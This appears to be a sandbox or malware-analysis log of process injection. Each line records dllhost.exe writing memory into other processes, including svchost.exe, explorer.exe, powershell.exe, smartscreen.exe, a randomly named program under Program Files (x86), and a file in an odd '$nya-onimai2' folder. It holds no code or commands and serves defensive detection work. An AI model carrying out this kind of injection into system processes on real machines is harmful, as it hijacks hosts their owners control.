Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A142790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 23A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2F10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2270000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 830000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 850000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25177B50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20859990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 192913B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 139F96A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 9850000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 175C5280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B469900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\$nya-onimai2\qVrKPA.exe base: 1910E810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 227C08C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27234C50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28543540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 247B4700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1DAD8A40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE3F3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC87880000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1C39C960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 10C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 20F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 15D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 26D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2430000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2FB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 30C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 28E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 29F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 840000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3000000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 970000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: FE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 24D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2AC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1290000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000
